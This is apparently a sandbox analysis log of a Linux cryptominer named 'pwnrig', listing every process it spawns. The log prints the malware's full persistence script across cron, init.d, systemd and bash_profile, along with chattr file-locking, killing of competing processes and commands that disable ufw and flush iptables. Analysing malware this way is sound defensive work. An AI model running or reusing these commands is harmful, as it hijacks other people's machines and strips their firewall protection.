/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
-
/usr/bin/whichwhich systemctl4⤵
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
/usr/bin/rmrm -rf /bin/sysdr4⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵
- Reads EFI boot settings
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
- Reads EFI boot settings
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
- Reads EFI boot settings
- Reads runtime system information
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/whoamiwhoami4⤵
-
/usr/bin/hostnamehostname4⤵
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
/usr/bin/psps -A "-ostat,ppid"4⤵
-
/usr/bin/idid -u4⤵
-
/usr/bin/grepgrep -v grep4⤵
-
/usr/bin/grepgrep /etc/cron4⤵
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/idid -u4⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵
-
/usr/bin/grepgrep -v grep4⤵
-
/usr/bin/psps aux4⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
-
/usr/bin/idid -u4⤵
-
/usr/bin/crontabcrontab -r2⤵
-
/usr/bin/pkillpkill -f .klibsystem52⤵
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads CPU attributes
-
/usr/bin/bashbash -c "echo \"* * * * * /run/user/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/whoamiwhoami4⤵
-
/usr/bin/hostnamehostname4⤵
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads runtime system information
-
/usr/bin/idid -u4⤵
-
/usr/bin/grepgrep -v grep4⤵
-
/usr/bin/grepgrep /etc/cron4⤵
-
/usr/bin/psps x4⤵
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- Writes file to tmp directory
-
/usr/bin/idid -u4⤵
-
/usr/bin/idid -u4⤵
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
-
/usr/bin/rmrm -rf /bin/bprofr4⤵
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
-
/usr/bin/idid -u4⤵
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- Attempts to change immutable files
-
/usr/bin/rmrm -rf /bin/crondr4⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
/usr/bin/whichwhich chkconfig4⤵
-
/usr/bin/whichwhich update-rc.d4⤵
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
/usr/bin/rmrm -rf /bin/initdr4⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵
-
/usr/bin/klibsystem5./klibsystem51⤵
-
/usr/bin/hostnamehostname -I1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/grepgrep "Port "1⤵
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/grepgrep "Port "1⤵
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/wcwc -l1⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵
-
/usr/bin/grepgrep -v grep1⤵
-
/usr/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
-
/var/tmp/.klibsystem5-x/var/tmp/.klibsystem5-x1⤵
- Executes dropped EXE
-
/usr/bin/bashbash -c "ufw disable"2⤵
-
/usr/sbin/ufwufw disable2⤵
-
/usr/sbin/iptables/usr/sbin/iptables -V3⤵
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵
-
/sbin/iptablesiptables -F ufw-not-local4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -F ufw-user-limit4⤵
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵
-
/sbin/iptablesiptables -F ufw-reject-input4⤵
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵
-
/sbin/iptablesiptables -F ufw-after-input4⤵
-
/sbin/iptablesiptables -F ufw-user-input4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -F ufw-before-input4⤵
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵
- Attempts to change immutable files
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -F ufw-after-forward4⤵
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵
-
/sbin/iptablesiptables -F ufw-user-forward4⤵
-
/sbin/iptablesiptables -F ufw-before-forward4⤵
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -F ufw-track-forward4⤵
-
/sbin/iptablesiptables -F ufw-track-output4⤵
-
/sbin/iptablesiptables -F ufw-track-input4⤵
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵
-
/sbin/iptablesiptables -F ufw-reject-output4⤵
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -F ufw-after-output4⤵
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵
-
/sbin/iptablesiptables -F ufw-user-output4⤵
-
/sbin/iptablesiptables -F ufw-before-output4⤵
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵
-
/sbin/iptablesiptables -Z ufw-not-local4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵
-
/sbin/iptablesiptables -Z ufw-after-input4⤵
-
/sbin/iptablesiptables -Z ufw-user-input4⤵
-
/sbin/iptablesiptables -Z ufw-before-input4⤵
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵
-
/sbin/iptablesiptables -Z ufw-track-output4⤵
-
/sbin/iptablesiptables -Z ufw-track-input4⤵
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵
-
/sbin/iptablesiptables -Z ufw-after-output4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵
-
/sbin/iptablesiptables -Z ufw-user-output4⤵
-
/sbin/iptablesiptables -Z ufw-before-output4⤵
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵
-
/sbin/iptablesiptables -X ufw-not-local4⤵
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵
- Flushes firewall rules
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵
-
/sbin/iptablesiptables -X ufw-user-limit4⤵
-
/sbin/iptablesiptables -X ufw-user-input4⤵
-
/sbin/iptablesiptables -X ufw-user-forward4⤵
-
/sbin/iptablesiptables -X ufw-user-output4⤵
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵
- Flushes firewall rules
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵
- Flushes firewall rules
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵
- Flushes firewall rules
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵
- Flushes firewall rules
-
